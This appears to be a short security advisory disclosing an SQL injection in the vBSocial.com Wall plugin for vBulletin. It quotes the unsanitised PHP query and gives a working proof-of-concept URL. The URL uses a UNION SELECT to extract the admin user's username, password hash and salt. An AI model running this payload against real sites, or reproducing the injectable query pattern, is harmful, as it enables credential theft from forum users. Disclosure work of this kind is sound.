vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest) The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		$status_item = $vbulletin->db->query_first(“SELECT * FROM “.TABLE_PREFIX.”status WHERE id=’$status_id'”);
		if ($status_item)
		{
			$status_item[‘message’] = htmlspecialchars_uni($status_item[‘message’]);
			$status_item[‘message’] = smartConvertPost($status_item[‘message’]); // parse image links
			$status_item[‘message’] = parse_youtubelinks($status_item[‘message’]);     // parse youtube video links
            $status_item[‘message’] = nl2br(trim(fetch_censored_text($status_item[‘message’])));

		     if ($status_item[‘type’] == ‘poll’){
		     	 $poll_get = $vbulletin->db->query_read(“SELECT * FROM “.TABLE_PREFIX.”status_poll WHERE statusid='”.$status_item[‘id’].”‘”);
		     	 if ($vbulletin->db->num_rows($poll_get) > 0){
		     	 	 $i = 0;
		     	 	while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
		     	 		$i ++;
		     	 		$status_item[‘message’] .= ‘
‘; } } } return $status_item[‘message’]; } }

User input data is being passed to functions without being sanitized or checked.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.

Images
vBSocial Wall SQL Injection

Leave a Reply

Your email address will not be published / Required fields are marked *